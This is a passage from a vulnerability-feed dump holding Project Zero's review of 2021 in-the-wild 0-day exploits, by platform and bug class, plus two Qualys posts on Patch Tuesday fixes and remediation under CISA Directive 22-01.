the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. \n\n## iOS/macOS\n\nAs discussed in the \u201cMore disclosure\u201d section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we\u2019re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPGaOlQUGIYyvpDY_M0rGh3JekH4mwXHfN459HYcklg74v4Mfp8j6fgh2SM09mjhA4svdgN_TdSN3R5Bb-DJTHnlo63qnRTsvLs1EZgAE3fBpRtsZhxKhyBNTb_khdS6mNT3EtSHnS_R-TshtHx-gSWnEPpHjmSqO_9Y7JxupGcDKZ0-xwsxgbX6zR/s1200/image6%284%29.png>)\n\nFor the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:\n\n * IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))\n * XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) &amp; [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))\n * CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))\n * CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) \\- CVE requested, not yet assigned)\n\nThese 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen\u2019s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It\u2019s a popular attack surface because historically it\u2019s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, [CVE-2022-22587](<https://support.apple.com/en-us/HT213053>).\n\nOne iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU\u2019s inter-process communication (IPC) functionality. [CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) exploited a vulnerability in mach vouchers while [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) exploited a vulnerability in mach messages. This is not the first time we\u2019ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. [CVE-2019-6625](<https://support.apple.com/en-us/HT209443>) was exploited as a part of [an exploit chain targeting iOS 11.4.1-12.1.2](<https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-5.html>) and was also a [vulnerability in mach vouchers](<https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html>). \n\nMach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>) &amp; [CVE-2020-27950](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27950.html>). This year\u2019s [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>) is a pretty close variant to 2020\u2019s [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). Tielei Wang and Xinru Chi actually [presented on this vulnerability at zer0con 2021](<https://github.com/wangtielei/Slides/blob/main/zer0con21.pdf>) in April 2021. In their presentation, they explained that they found it while doing variant analysis on [CVE-2020-27932](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-27932.html>). [TieLei Wang explained via Twitter](<https://twitter.com/WangTielei/status/1486266258152726530>) that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.\n\nThe two FORCEDENTRY exploits ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) and the [sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>)) were the only times that made us all go \u201cwow!\u201d this year. For [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the integer overflow in CoreGraphics, it was because: \n\n 1. For years we\u2019ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and\n 2. The exploit was an impressive work of art. \n\nThe sandbox escape (CVE requested, not yet assigned) was impressive because it\u2019s one of the few times we\u2019ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs. \n\nFor [CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), the vulnerability itself wasn\u2019t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Gro\u00df &amp; Ian Beer as \u201cone of the most technically sophisticated exploits [they]\u2019ve ever seen\u201d. [Their blogpost shares all the details](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>), but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:\n\nUsing over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.\n\nThe bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.\n\nThis is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.\n\n## Android\n\nThere were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: [CVE-2019-2215](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-2215.html>). Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we\u2019ll compare it to public security research.\n\nFor the 7 Android 0-days they targeted the following components:\n\n * Qualcomm Adreno GPU driver ([CVE-2020-11261](<https://source.android.com/security/bulletin/2021-01-01>), [CVE-2021-1905](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-1905.html>), [CVE-2021-1906](<https://source.android.com/security/bulletin/2021-05-01>))\n * ARM Mali GPU driver ([CVE-2021-28663](<https://source.android.com/security/bulletin/2021-05-01>), [CVE-2021-28664](<https://source.android.com/security/bulletin/2021-05-01>))\n * Upstream Linux kernel ([CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>), [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>))\n\n5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against \u201cAndroid devices\u201d, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU. \n\nPublic security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, [Guang Gong](<https://github.com/secmob/TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices/blob/master/us-20-Gong-TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices-wp.pdf>), [Man Yue Mo](<https://securitylab.github.com/research/one_day_short_of_a_fullchain_android/>), and [Ben Hawkes](<https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html>) all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver. \n\nThe two non-GPU driver 0-days ([CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) and [CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>)) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it\u2019s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.\n\nThe vulnerability now referred to as [CVE-2021-0920](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>) was actually found in September 2016 and [discussed on the Linux kernel mailing lists](<https://lore.kernel.org/lkml/CAOssrKcfncAYsQWkfLGFgoOxAQJVT2hYVWdBA6Cw7hhO8RJ_wQ@mail.gmail.com/>). A [patch was even developed back in 2016](<https://lore.kernel.org/lkml/1475150954-10152-1-git-send-email-mszeredi@redhat.com/>), but it didn\u2019t end up being submitted. The bug was finally [fixed in the Linux kernel in July 2021](<https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cbcf01128d0a92e131bd09f1688fe032480b65ca>) after the detection of the in-the-wild exploit targeting Android. The patch then made it into the [Android security bulletin in November 2021](<https://source.android.com/security/bulletin/2021-11-01#kernel-components>).\n\n[CVE-2021-1048](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1048.html>) remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.\n\n## Microsoft Exchange Server\n\nIn 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four ([CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)) were all disclosed and patched at the same time and used together in a [single operation](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). The fifth ([CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>)) was patched on its own in November 2021. [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), the attackers would have required at least another 0-day for successful exploitation since [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>) is a post-authentication bug.\n\nOf the four Exchange in-the-wild 0-days used in the first campaign, [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>), which is also known as \u201cProxyLogon\u201d, is the only one that\u2019s pre-auth. [CVE-2021-26855](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26855.html>) is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) allowed attackers to write arbitrary files to the system. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.\n\nFor the second campaign, [CVE-2021-42321](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321>), like [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.\n\nWhile there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it\u2019s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don\u2019t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.\n\nWhile this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was [n-day exploitation of Exchange Servers](<https://www.cisa.gov/uscert/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>). Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we\u2019ll likely see it continue into 2022.\n\n# Outstanding Questions\n\nWhile there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we\u2019re missing and why, and the need for more transparency from both vendors and researchers.\n\nUntil the day that attackers decide to happily share all their exploits with us, we can\u2019t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we\u2019re very likely missing. From that, these are some of the key questions we\u2019re asking ourselves as we move into 2022:\n\n## Where are the [x] 0-days?\n\nDespite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there\u2019s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.\n\nAlong with messaging apps, there are other platforms/targets we\u2019d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there\u2019s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.\n\nThis leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?\n\n## Do some vendors have no known in-the-wild 0-days because they\u2019ve never been found or because they don\u2019t publicly disclose?\n\nUnless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don\u2019t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.\n\n## Are we seeing the same bug patterns because that\u2019s what we know how to detect?\n\nAs we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that\u2019s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that\u2019s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we\u2019d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers. \n\n## Where are the spl0itz?\n\nTo successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful). \n\nUnfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.\n\nAs an aside, if you have an exploit sample that you\u2019re willing to share with us, please reach out. Whether it\u2019s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we\u2019d be happy to work with you.\n\n# Conclusion\n\nLooking back on 2021, what comes to mind is \u201cbaby steps\u201d. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we\u2019re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we\u2019ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they\u2019re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.\n\nWhile this all may seem daunting, the promising part is that we\u2019ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it\u2019s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress: \n\n\n 1. Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,\n 2. Vendors and security researchers sharing exploit samples or detailed descriptions of the exploit techniques.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.\n\nThrough 2021 we continually saw the real world impacts of the use of 0-day exploits against users and entities. Amnesty International, the Citizen Lab, and others highlighted [over](<https://citizenlab.ca/2021/10/breaking-news-new-york-times-journalist-ben-hubbard-pegasus/>) and [over](<https://www.amnesty.org/en/documents/doc10/4491/2021/en/>) how governments were using commercial surveillance products against [journalists](<https://forbiddenstories.org/pegasus-the-new-global-weapon-for-silencing-journalists/>), [human rights defenders](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>), and [government officials](<https://www.reuters.com/technology/exclusive-us-state-department-phones-hacked-with-israeli-company-spyware-sources-2021-12-03/>). We saw many enterprises scrambling to remediate and protect themselves from the [Exchange Server 0-days](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). And we even learned of peer [security researchers being targeted by ](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>)[North Korean government hackers](<https://blog.google/threat-analysis-group/update-campaign-targeting-security-researchers/>). While the majority of people on the planet do not need to worry about their own personal risk of being targeted with 0-days, 0-day exploitation still affects us all. These 0-days tend to have an outsized impact on society so we need to continue doing whatever we can to make it harder for attackers to be successful in these attacks.\n\n2021 showed us we\u2019re on the right track and making progress, but there\u2019s plenty more to be done to make 0-day hard.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T00:00:00", "type": "googleprojectzero", "title": "\nThe More You Know, The More You Know You Don\u2019t Know\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4654", "CVE-2019-13720", "CVE-2019-2215", "CVE-2019-6625", "CVE-2020-0688", "CVE-2020-11261", "CVE-2020-16009", "CVE-2020-27932", "CVE-2020-27950", "CVE-2021-0920", "CVE-2021-1048", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1844", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28310", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30737", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-30883", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-36948", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-41773", "CVE-2021-42321", "CVE-2022-21882", "CVE-2022-22587"], "modified": "2022-04-19T00:00:00", "id": "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156", "href": "https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-03-03T12:28:18", "description": "This month\u2019s Microsoft Patch Tuesday addresses 56 vulnerabilities, of which 11 are rated as Critical. Adobe released patches today for Reader, Acrobat, Magento, Photoshop, Animate, Illustrator, and Dreamweaver.\n\n### TCP/IP Trio\n\nMicrosoft released a set of fixes affecting Windows TCP/IP implementation that include two Critical Remote Code Execution (RCE) vulnerabilities (CVE-2021-24074 and CVE-2021-24094) and an Important Denial of Service (DoS) vulnerability (CVE-2021-24086). While there is no evidence that these vulnerabilities are exploited in wild, these vulnerabilities should be prioritized given their impact.\n\n### Windows Fax Service\n\nMicrosoft released patches to fix a remote code execution vulnerability in Windows Fax Service (CVE-2021-24077). This vulnerability has a CVSSv3 base score of 9.8 and should be prioritized for patching.\n\n### Windows DNS Server\n\nMicrosoft released patches to fix a remote code execution vulnerability in Windows DNS Server (CVE-2021-24078). This vulnerability has a CVSSv3 base score of 9.8 and should be prioritized for patching.\n\n### Windows Win32k Elevation of Privilege\n\nMicrosoft released updates to fix a local privilege escalation vulnerability in Win32K (CVE-2021-1732). This vulnerability is reportedly exploited in the wild and should be prioritized for patching.\n\n### Workstation Patches\n\nMicrosoft Office vulnerabilities should be prioritized for workstation-type devices.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in Adobe Reader, Acrobat, Magento, Photoshop, Animate, Illustrator, and Dreamweaver. Patching Adobe Acrobat and Reader should be prioritized as Adobe has received reports of CVE-2021-21017 exploited in wild targeting Adobe Reader users on Windows.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-02-09T20:22:38", "type": "qualysblog", "title": "February 2021 Patch Tuesday \u2013 56 Vulnerabilities, 11 Critical, Adobe", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24086", "CVE-2021-24094"], "modified": "2021-02-09T20:22:38", "id": "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n 